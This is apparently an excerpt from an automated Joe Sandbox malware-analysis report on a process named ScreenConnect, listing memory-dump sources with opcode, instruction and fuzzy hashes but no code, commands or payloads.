                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 042576148308486ff5700ece46c5d39a682dc895864c6eeb216f7d2663a9981c
                                                                • Instruction ID: 8f2c318b84a957bda951efe3978fd741ee3c8568af48cc9c030a43b316ce4a8c
                                                                • Opcode Fuzzy Hash: 042576148308486ff5700ece46c5d39a682dc895864c6eeb216f7d2663a9981c
                                                                • Instruction Fuzzy Hash: A0412535E0434A8FEB15DBB4C8507EEBBB2FF8A200F148269D411BB641DB756C05C7A1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9bfa4e4a40bf6e595322fa40227df2f9105f7e0f05f052c10a1045c080272785
                                                                • Instruction ID: 107d4212d73ba92b6832a687d12bf6ec5c2748954225828ac647d266a8434533
                                                                • Opcode Fuzzy Hash: 9bfa4e4a40bf6e595322fa40227df2f9105f7e0f05f052c10a1045c080272785
                                                                • Instruction Fuzzy Hash: 4D413D71E1021A9BDB14DFA6C890BEEBBB6FF88700F148129E511BB354DB70AD45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 00a719eb76c19904c028478dc088fb3012753311bb05a6d28ac6fb26c338e3cb
                                                                • Instruction ID: 3c58317d947da8f0c826d0ea43c9fe65a85e3b73ccf1e1ce0157d647a2eb380d
                                                                • Opcode Fuzzy Hash: 00a719eb76c19904c028478dc088fb3012753311bb05a6d28ac6fb26c338e3cb
                                                                • Instruction Fuzzy Hash: 6B413E70A00745CFC720DF29D484A6ABBF2FF89354B188658D596CB3A5D731E806CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33ad0a87d22c53caadb7bf349798f7a8d45ccf9ccfc6fbfcbb305f4949277e88
                                                                • Instruction ID: e0b8a3d477e7f15243dc9db03b6123f5203d9d6d75064063344274a887ed715a
                                                                • Opcode Fuzzy Hash: 33ad0a87d22c53caadb7bf349798f7a8d45ccf9ccfc6fbfcbb305f4949277e88
                                                                • Instruction Fuzzy Hash: 1E417934700605DFDB10CF58C894DAABBF2FF89310B19C9A9E5599B221D731F951CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3d33bf6b4ae5cdccd98f9d8067ccaa1252b13647d1fa4fa8961efe62114aecb
                                                                • Instruction ID: d47b367819649fd430f1f0a56033b649059b644ce1f003ba79b1711387cfdf59
                                                                • Opcode Fuzzy Hash: e3d33bf6b4ae5cdccd98f9d8067ccaa1252b13647d1fa4fa8961efe62114aecb
                                                                • Instruction Fuzzy Hash: 3B414331604B019BD738CE69D890A9BB7F6AF84320B108B2DE566C76D0DB71F8068B91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2307b156066c7a8badab07feb99979c62d65743b762eb1182fa04875b7d10709
                                                                • Instruction ID: d4d99785882bb40a82b9d22afd2b22779be017f401282b912bcc0c7e1ecc72c0
                                                                • Opcode Fuzzy Hash: 2307b156066c7a8badab07feb99979c62d65743b762eb1182fa04875b7d10709
                                                                • Instruction Fuzzy Hash: E3411574A00215CFD718DB68C998B99B7F2FF89310F1481A9E54AEB361DB71AD81CF50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe77cab1d907c73fb3907d1c92847fd8efe82cb8a5a8b8d23ad686b645fd5387
                                                                • Instruction ID: aacef5e00b09f26c23db460d447fa63d19a636db95c42bb4354c8f0d7863ad14
                                                                • Opcode Fuzzy Hash: fe77cab1d907c73fb3907d1c92847fd8efe82cb8a5a8b8d23ad686b645fd5387
                                                                • Instruction Fuzzy Hash: 85316F34B1021A8FCB14EBADD4509AEF7F6EF89250B14866AD909D7358EB30EC058BD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 264b68798e2def5a3dfcf6008cd2b2a6290b6a8d0be7af5014b52f4807b8541b
                                                                • Instruction ID: 96d339aba8c47e92eea39214132bd1a00458427dcd41efc36b384f2540ebdf8a
                                                                • Opcode Fuzzy Hash: 264b68798e2def5a3dfcf6008cd2b2a6290b6a8d0be7af5014b52f4807b8541b
                                                                • Instruction Fuzzy Hash: 27416331A103099BEF18DFB1CC54BEE7BB6BF88304F108529E505AB295EFB59945CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c3697e82479f238c1bd74e884e6fbdefa6de8881a80c0c99f20e7829c651cc7
                                                                • Instruction ID: 621172945dda522fe7cbbd2859e5ef9b6f05fcc1db7b511b60ab6a14d9a37938
                                                                • Opcode Fuzzy Hash: 3c3697e82479f238c1bd74e884e6fbdefa6de8881a80c0c99f20e7829c651cc7
                                                                • Instruction Fuzzy Hash: 8A314531E103099BEF18DFA1C8547EE7BB6AF88304F108529E505AB295EFB59945CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa90ae145d50e277858796ceaa27c2fa27cfe2c73a16a8ab06ad932a61c50704
                                                                • Instruction ID: c577275afb2759c34bbf751dd671e9562d7728adb87222435a0e54f3b1587222
                                                                • Opcode Fuzzy Hash: fa90ae145d50e277858796ceaa27c2fa27cfe2c73a16a8ab06ad932a61c50704
                                                                • Instruction Fuzzy Hash: 8F41E830A01215DFEF28DF68D998AEC77B3FB45315F1046A9E5159B2A2DBB99D80CB00
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db2c38075d09c08768d626dab8c707a15e1ccf691502e3285971ea1d836e7927
                                                                • Instruction ID: 1badb8b81d802645c2e71591c31fe161c322f02cd17a33732ed431cbb9c20e2a
                                                                • Opcode Fuzzy Hash: db2c38075d09c08768d626dab8c707a15e1ccf691502e3285971ea1d836e7927
                                                                • Instruction Fuzzy Hash: A1318F31A04259CFDB15DB68C8A4AEDBBF1FF4A310F15409AD541AB362DB349C45CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f5790497b332eda66f7826f05e1f4e6af3b96ed98957fdd5153e1c81a63406d
                                                                • Instruction ID: 014a02a47bbe74ba56fbf2434c86a9cefb390d30228170804b9502eea7a9aab1
                                                                • Opcode Fuzzy Hash: 6f5790497b332eda66f7826f05e1f4e6af3b96ed98957fdd5153e1c81a63406d
                                                                • Instruction Fuzzy Hash: DF310738700606CFCB14DF69E994D6ABBF2FF8931071485A8E51A8B361EB30EC05CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f6fe800a7d516fbeb3216cc3a75618ab8d594d3de28a0128a47028cc4d43108
                                                                • Instruction ID: fe8daa48cf259a88be78befd597a9d9f4eedefe8199ab8b6c7fd191bd03ebed9
                                                                • Opcode Fuzzy Hash: 8f6fe800a7d516fbeb3216cc3a75618ab8d594d3de28a0128a47028cc4d43108
                                                                • Instruction Fuzzy Hash: B441F5397006068FCB14DF69E994D6ABBF2FF8931171885A9E55ACB361EB30EC04CB40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 89c5cd091afce4044a2e05878d935fabc299b1c14427798a1867e09abb329f40
                                                                • Instruction ID: 317970f10cbd48bed8e954a6e17a60f588d96301f0f89bf340d96abc7abe7315
                                                                • Opcode Fuzzy Hash: 89c5cd091afce4044a2e05878d935fabc299b1c14427798a1867e09abb329f40
                                                                • Instruction Fuzzy Hash: B3317074600205CFDF18CF28E8D4A9A7BB6FF89320B144294D9529F3E9D771E851CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb177479056307f9ca6a202d3727c0093068ca7092e3cda6bc3f6d880e0a090a
                                                                • Instruction ID: 90ec08d697d0525de3e34c9135b281ccf9f0d6a930a2f8bc753745001b81660c
                                                                • Opcode Fuzzy Hash: eb177479056307f9ca6a202d3727c0093068ca7092e3cda6bc3f6d880e0a090a
                                                                • Instruction Fuzzy Hash: A7410574A00219CFEB14DFA8D594AADBBF2AF48304F148559E411EB361CBB4EC44CF61
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 397da19a930d34ee8c2b6ec634c89676299638eb381a1384ba3083e10b7f38a1
                                                                • Instruction ID: a29e0628722aec2309f75860290eb28f61ee1290d95ec0e2469dfb246203a1ce
                                                                • Opcode Fuzzy Hash: 397da19a930d34ee8c2b6ec634c89676299638eb381a1384ba3083e10b7f38a1
                                                                • Instruction Fuzzy Hash: C2411674B40215CFD718DB28C594B99BBF6EF89310F1480A9E54AEB361CB71AC81CF40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de298d54f948584e9c25eedba08fd4fc63b83b6b1efa2be4fb3a99bfa5a726a6
                                                                • Instruction ID: e36fce0e3eab795ba987ca23f0de91f64bc83249fa39a0444d0a15c3d4f681ac
                                                                • Opcode Fuzzy Hash: de298d54f948584e9c25eedba08fd4fc63b83b6b1efa2be4fb3a99bfa5a726a6
                                                                • Instruction Fuzzy Hash: 4831E830610B028BC734DF3AE85865ABBF1FF84711B144B2DE456C76E4EB70A948CB94
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cea2218d6e69150b0b9933a5a947db142789df4758c0ab1aba3e848dd452cb61
                                                                • Instruction ID: 635a32be1441483b1f31016ec49797624637eb969b7162833d7862b0c966948f
                                                                • Opcode Fuzzy Hash: cea2218d6e69150b0b9933a5a947db142789df4758c0ab1aba3e848dd452cb61
                                                                • Instruction Fuzzy Hash: 0E21B5347042018BDF119B7CD5A0AAABFF6EF86340B48866AD915CF359EB74DC05C7A1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0796a09078ad9fff7932257d9b8ab02d7d641e37b1a2f0eb7324d9821922fdfb
                                                                • Instruction ID: 4a23df0b089ab3d2c35d58b13e4bb0f675152ab02d555f92f134aac534bbfb63
                                                                • Opcode Fuzzy Hash: 0796a09078ad9fff7932257d9b8ab02d7d641e37b1a2f0eb7324d9821922fdfb
                                                                • Instruction Fuzzy Hash: 0F31A231E0170ADBDB20DFA5E4186EDBBB7FF84300F254629E505B3290EBB06946DB85
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d91d84a9ce826668dedaad28ed5013935a67a97c6d6d3ba2eded1e0467d8353
                                                                • Instruction ID: c4a4116a3dba1dd88d1d802e6b6898d5268a5067c011d7f57b98647995319cd4
                                                                • Opcode Fuzzy Hash: 1d91d84a9ce826668dedaad28ed5013935a67a97c6d6d3ba2eded1e0467d8353
                                                                • Instruction Fuzzy Hash: 9C31BF32E102098BDB01DFB4D8405DDFBB6EFC9310F55866AD5057B254EB726A4ACB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b3ee63047ee12460245ba1ad3a16b42d83e1270a1277925446868ccb481e442
                                                                • Instruction ID: d937e776ee21cb2f477c7e614452557e781dc875b5399abf6a37959bd19df91a
                                                                • Opcode Fuzzy Hash: 1b3ee63047ee12460245ba1ad3a16b42d83e1270a1277925446868ccb481e442
                                                                • Instruction Fuzzy Hash: B821F5316043919BE706CB28EC61BEA3FB5EF46314B14896ED1009F242DFB6E80687D5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b762e49b5210746bc4a269e116357c5078ab72b4976159013ea2511780cbfb6c
                                                                • Instruction ID: a2a26d303f58de005e03b1e426a94c0023b2926c6c096c6c33a11a0eaf92f849
                                                                • Opcode Fuzzy Hash: b762e49b5210746bc4a269e116357c5078ab72b4976159013ea2511780cbfb6c
                                                                • Instruction Fuzzy Hash: 0A2183387002058BDF14DA7CD590EAEBBF6EF853407488529D919DF318EB74DC0587A1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392100124.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_124d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b4b6da4ad3498b1f60f2a66aabd6965da0af960fc3326edc9dbe77d05689f89
                                                                • Instruction ID: 4cbec0a48aa3dd14d151028fc3743c92a6675981ff44697fa7af74cb46369949
                                                                • Opcode Fuzzy Hash: 1b4b6da4ad3498b1f60f2a66aabd6965da0af960fc3326edc9dbe77d05689f89
                                                                • Instruction Fuzzy Hash: AF216A72510248DFDB0DDF54D9C0B16BF65FB98310F20856CEA090B247C376D445CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 22662b85cae3c41ccd663e895e70aa04744e3f3bf8e6560ad7a1cc0c99948086
                                                                • Instruction ID: 9e418d509d770669084104c5409a8cec15d374f7f1ec0192d2eda90f875335f3
                                                                • Opcode Fuzzy Hash: 22662b85cae3c41ccd663e895e70aa04744e3f3bf8e6560ad7a1cc0c99948086
                                                                • Instruction Fuzzy Hash: D021903161024ACFCB11DB68DC91AEEBBB1FF86300B0486AED555DF355EB70A915CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ec501d4a6b6df864779e322df08667a9b685bb8a3e47b5bef86328b60aced77e
                                                                • Instruction ID: 740c9e601d372b1f779571258dc64c9597a011e23d2e057eeba93daccd24a05a
                                                                • Opcode Fuzzy Hash: ec501d4a6b6df864779e322df08667a9b685bb8a3e47b5bef86328b60aced77e
                                                                • Instruction Fuzzy Hash: 31316530600205DFDF28DF24E8C569ABB72FF44311F118669E8159F2D9EB71D991CB91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c583f848faf40bc4a0afd5e07b4f4b2799a11816c432a092d2cb4196304b9a7d
                                                                • Instruction ID: 7f5415715d5d68c0a217916bfe8fc9f3c9d1a464b1c8272c5fa8d6966de7a04e
                                                                • Opcode Fuzzy Hash: c583f848faf40bc4a0afd5e07b4f4b2799a11816c432a092d2cb4196304b9a7d
                                                                • Instruction Fuzzy Hash: 2B3102B6900249EFDF14CF99D844ADEBBF9FB48310F10841AE919A7310C775A915CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b193121d3c5fb26ae74ba6dbf5fd431bd51d918e06849286949954dfd8dc276e
                                                                • Instruction ID: ab6acca625f87cd7e0ff2085985b28fa9652596733a462ba83a31d84614b5560
                                                                • Opcode Fuzzy Hash: b193121d3c5fb26ae74ba6dbf5fd431bd51d918e06849286949954dfd8dc276e
                                                                • Instruction Fuzzy Hash: 0831DFB6904249EFDF14CF99D884ADEBBF5FB48310F10842AE919A7310C7B5A915CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5b25c7fa20a4eeba28265f5766b8a2ab68d568ac6a47160e7664f14358b4c266
                                                                • Instruction ID: bc56955ba4fd0d7983ba394790af27f327942030a764fba642e92d816d2cb585
                                                                • Opcode Fuzzy Hash: 5b25c7fa20a4eeba28265f5766b8a2ab68d568ac6a47160e7664f14358b4c266
                                                                • Instruction Fuzzy Hash: 4B311834A102198FDB19DF68D894AADB7F6FF89310F5081A9D409E7360DB319E81CF00
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7fd9417a98e7e0ef3ef9220277e5b3785c52d7213d94c5f8d7c314adc22db34
                                                                • Instruction ID: d0634683dc52a4cdfac35f4273a8b6e3170e08fbec4a2d517c113e34306625cd
                                                                • Opcode Fuzzy Hash: c7fd9417a98e7e0ef3ef9220277e5b3785c52d7213d94c5f8d7c314adc22db34
                                                                • Instruction Fuzzy Hash: 65210E31B002058FDB14DF69C698AAEBBF6EF89394F148069E506E7394DBB1DD01CB94
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c25fe0b1951ee7d53400b7b9878b68df5236d5c0b516707e5eea2a203025b63
                                                                • Instruction ID: 756b775259a250d30b86567a29ddcccbcab9c3ab4cdf0a6a5a6795e6aaa88a95
                                                                • Opcode Fuzzy Hash: 9c25fe0b1951ee7d53400b7b9878b68df5236d5c0b516707e5eea2a203025b63
                                                                • Instruction Fuzzy Hash: 0921007530454E9BEB24CE18D9849DE33A2FB64361F508D11FC25CB255C7B1ED918BA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de1718ab765b0071bf0b397200fc102190e9667ebd0e057bfd570162c18eca29
                                                                • Instruction ID: 9fd7ed7f285f67b1fbe0a285cef535b2069619c03992046d7f928db698d12d87
                                                                • Opcode Fuzzy Hash: de1718ab765b0071bf0b397200fc102190e9667ebd0e057bfd570162c18eca29
                                                                • Instruction Fuzzy Hash: 13213E31B002058FDB14DF69C594AEABBF6EF89250F188459E506EB390DBB1DD42CB94
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b20b2441db4663ea46d51219a6e99052041f5e4d426aaa8caf85208c355ce683
                                                                • Instruction ID: 610a6a2e1ce93d88ea7ec677795fe8c626dce83b581f6f8a2b84a67c441c56ed
                                                                • Opcode Fuzzy Hash: b20b2441db4663ea46d51219a6e99052041f5e4d426aaa8caf85208c355ce683
                                                                • Instruction Fuzzy Hash: 30211631A04119CFDF14DFA8D964AEDBBF2BF89314F144069D105AB360DB74AD44CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9db0364d781afc17164b1b2567bd5bde71c459f199cf3cd5a6272451570943
                                                                • Instruction ID: 3f87e8b3cbe041015b415622856a029f4e7b1db741c949e95876a04c849dba07
                                                                • Opcode Fuzzy Hash: 1a9db0364d781afc17164b1b2567bd5bde71c459f199cf3cd5a6272451570943
                                                                • Instruction Fuzzy Hash: 1521B230650201EFE715EB38E8A4B99BBB2FFD6314F00866DE5055B695DB70AC09CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cc2dfa8cb0069e48647d4f6f44899670251481e1a5f7d38a47ef8fb36ea497c
                                                                • Instruction ID: 1ff0c8f25602ed1e9402201e68313dfe62706b181a18e5580eeb8c577b1fc557
                                                                • Opcode Fuzzy Hash: 0cc2dfa8cb0069e48647d4f6f44899670251481e1a5f7d38a47ef8fb36ea497c
                                                                • Instruction Fuzzy Hash: A5118E323042999FEB18DE6DD888EDE77A5FF88620F054669E948D7631D7B0DC40CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c2d2e0c1b16f95b840f9690dd1898212d274a7d855faff1f4ec5866b521049ac
                                                                • Instruction ID: 41b25756247e0c7446e7b02b85dd542a5fc056eceb1af14b887b06b787788129
                                                                • Opcode Fuzzy Hash: c2d2e0c1b16f95b840f9690dd1898212d274a7d855faff1f4ec5866b521049ac
                                                                • Instruction Fuzzy Hash: 8A21CF31A04200DBDB15EF58C990ADABBB2FF48310F568199C846AB755DB71FC42CBC0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e674f9e9b602918b307abbc5aba37e7c838dd66e54e20a6702d4201089a61caa
